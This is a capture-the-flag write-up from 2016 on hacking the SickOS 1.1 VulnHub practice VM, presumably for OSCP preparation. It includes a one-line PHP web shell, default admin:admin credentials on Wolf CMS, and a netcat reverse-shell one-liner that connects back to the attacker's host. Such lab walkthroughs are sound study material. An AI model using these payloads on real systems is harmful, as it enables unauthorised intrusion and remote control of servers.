Writeup SickOS 1.1

Published at 15 Jun 2016

Intro

So I come across subreddit /r/oscp recently, I found a comment that suggest to practice to hack vulnhub VM before taking PWK course. One of the most recommended VM is SickOS. In this post I will try to explain how I hacked SickOS 1.1.

Scanning and Discovery

I configured SickOs VM network to host-only, so it has access to my machine.

host-only

First, I need to know the IP address of the target, I use netdiscover to do it, I set network interface as vboxnet0 same as SickOs

netdiscover

After running netdiscover, I found that the IP address is 192.168.56.101 then I run nmap, flag -sC means to run nmap script to target

$ nmap -sC 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-13 22:04 WIB
Nmap scan report for 192.168.56.101
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 08:00:27:A7:85:FF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds

There are 2 ports open, 22 and 3128. Port 3128 is squid http proxy server, and then I config my burp suite upstream proxy to 192.168.56.101:3128 to all destination host.

upstream

When I try to access 127.0.0.1, it gave me BLEHHH message, thats not my localhost so it must be SickOs localhost.

bleh

Furthermore, I run content discovery on burp and figure out there is directory named /wolfcms

content discovery

So I visited /wolfcms

wolfcms

Exploitation

I need to find login page, based on this article login page can be accessed using http://example.com/?admin/ then I try to login using admin:admin. Voila! it works.

login

So I logged in as admin and got access to dashboard. I stroll around the dashboard then I found file manager feature, so I try to upload simple PHP backdoor.

upload file

Here is the code, I named it cmd.php

<?php system($_REQUEST['c']); ?>
I successfuly uploaded php backdoor

upload file

PHP backdoor can be accessed in /public/ so I test using this request

request

the response was

response

I need to change method to POST, so I don’t have to URL encode my payload

method post

And then I execute reverse shell that listen to 9999 using nc

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 9999 >/tmp/f

Finally I got reverse shell

Post Exploitation

Now that I have a limited shell, My goal is to escalate privileges to obtain a root access. I found there is database config and then try the password to check reused password to user sickos and I run sudo su to got root

root

Thats it! Finally I obtained root access and get the flag.